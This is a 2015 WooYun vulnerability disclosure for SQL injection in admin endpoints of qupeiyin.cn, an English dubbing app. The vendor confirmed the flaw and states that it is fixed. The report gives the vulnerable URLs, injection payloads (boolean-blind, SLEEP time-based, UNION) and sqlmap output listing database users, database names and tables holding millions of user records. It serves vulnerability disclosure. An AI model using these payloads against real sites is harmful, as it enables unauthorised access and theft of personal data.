当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112946

漏洞标题:英语趣配音几处SQL注射百万用户信息泄露

相关厂商:qupeiyin.cn

漏洞作者: 路人甲

提交时间:2015-05-11 13:34

修复时间:2015-06-27 10:40

公开时间:2015-06-27 10:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-11: 细节已通知厂商并且等待厂商处理中
2015-05-13: 厂商已经确认,细节仅向厂商公开
2015-05-23: 细节向核心白帽子及相关领域专家公开
2015-06-02: 细节向普通白帽子公开
2015-06-12: 细节向实习白帽子公开
2015-06-27: 细节向公众公开

简要描述:

233

详细说明:

1,
http://admin.qupeiyin.cn/Weixin/test/share?study_show_id=1
2,
http://admin.qupeiyin.cn/Weixin/test/dubbing?course_id=
payload:
-1%20OR%203*2*1%3d6%20AND%2000014%3d00014
-1%20OR%203*2*2%3d6%20AND%2000014%3d00014

漏洞证明:

Parameter: study_show_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: study_show_id=1) AND 3416=3416 AND (2897=2897
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: study_show_id=1) AND (SELECT * FROM (SELECT(SLEEP(5)))yjyQ) AND (1949=1949
Type: UNION query
Title: MySQL UNION query (66) - 8 columns
Payload: study_show_id=1) UNION ALL SELECT 66,66,CONCAT(0x7178766a71,0x65475757677041747272,0x716b6b7171),66,66,66,66,66#
---
web application technology: Nginx, PHP 5.5.7
back-end DBMS: MySQL 5.0.12
current user is DBA: False
database management system users [4]:
[*] 'ishow'@'%'
[*] 'ishow'@'10.%'
[*] 'ishow'@'115.236.179.162'
[*] 'root'@'localhost'
available databases [5]:
[*] feizhuoa
[*] information_schema
[*] ishowgroup
[*] peiyin
[*] performance_schema
back-end DBMS: MySQL 5.0.12
Database: peiyin
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| visitor | 3885620 |
| messages | 2531915 |
| fans | 2068213 |
| show_top | 1435084 |
| study_show_info | 1434986 |
| study_show | 1434983 |
| comments | 1383915 |
| study_show_support | 1239518 |
| file_copy | 1183450 |
| study_show_copy | 1161214 |
| ucenter_member | 953757 |
| userinfo | 953731 |
| wechat_userinfo | 897580 |
| auth_token | 850685 |
| feedback_msglog | 834073 |
| pushinfo | 672344 |
| course_collect | 644258 |
| use_log | 630396 |
| outside_show_support | 474405 |
| picture | 463272 |
| words | 319321 |
| photo | 249939 |
| tieup_log | 159747 |
| user_spread | 142411 |
| messages_log | 112034 |
| spread_member | 102265 |
| album_through | 96479 |
| file | 40506 |
| feedback_msg | 37923 |
| guestbook | 35117 |
| search_keywords | 23560 |
| chat_wait_process | 19495 |
| school | 18819 |
| feedback | 18763 |
| spread_check | 16012 |
| course | 8284 |
| chat_members | 8200 |
| course_copy | 7931 |
| course_copy1 | 7931 |
| action_log | 7514 |
| home_recom | 6938 |
| course_nature | 6391 |
| activity_user | 3370 |
| stick | 3285 |
| syn_video | 3064 |
| spreader | 2684 |
| chat_member_course | 1973 |
| tch_class | 1597 |
| ugc_user_course | 1524 |
| slider | 1270 |
| course_edit | 1185 |
| course_album | 1069 |
| classes | 1050 |
| study_recomlog | 1031 |
| course_info | 819 |
| chat_task | 760 |
| winning_record | 731 |
| chat_group | 659 |
| location | 603 |
| area | 598 |
| auth_rule | 416 |
| album | 373 |
| menu | 346 |
| ugc_contribution | 296 |
| course_feedback | 269 |
| wechat_study_show | 256 |
| checksum | 250 |
| ugc_user | 241 |
| action_use | 224 |
| statistics | 185 |
| lessons_supports | 179 |
| report | 162 |
| push_message | 141 |
| camps | 114 |
| wechat_comment | 112 |
| ugc_group_photo | 67 |
| syn_page | 59 |
| lessons | 43 |
| auth_group_access | 42 |
| chat_category | 38 |
| wechat_support_record | 38 |
| nature | 37 |
| user_wisdom | 35 |
| gotye_regfail | 33 |
| teacher_apply | 33 |
| lessons_reserve | 31 |
| config | 30 |
| ugc_group | 26 |
| nature_copy | 23 |
| recommand | 23 |
| week_moon | 18 |
| mobile_code | 17 |
| auth_group | 16 |
| wechat_course | 15 |
| campus | 12 |
| `action` | 11 |
| hooks | 11 |
| auth_extend | 8 |
| ishow_class | 8 |
| article | 7 |
| lottery | 6 |
| course_category | 5 |
| gotye_msgid | 5 |
| basic_data | 4 |
| room | 4 |
| teacher | 4 |
| addons | 3 |
| activity | 2 |
| album_counter | 1 |
| course_counter | 1 |
| wechat_spread | 1 |
+-----------------------+---------+

修复方案:

~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-05-13 10:38

厂商回复:

非常感谢及时发现这个漏洞,这个属于开发忘将测试代码注释导致,现已修复

最新状态:

暂无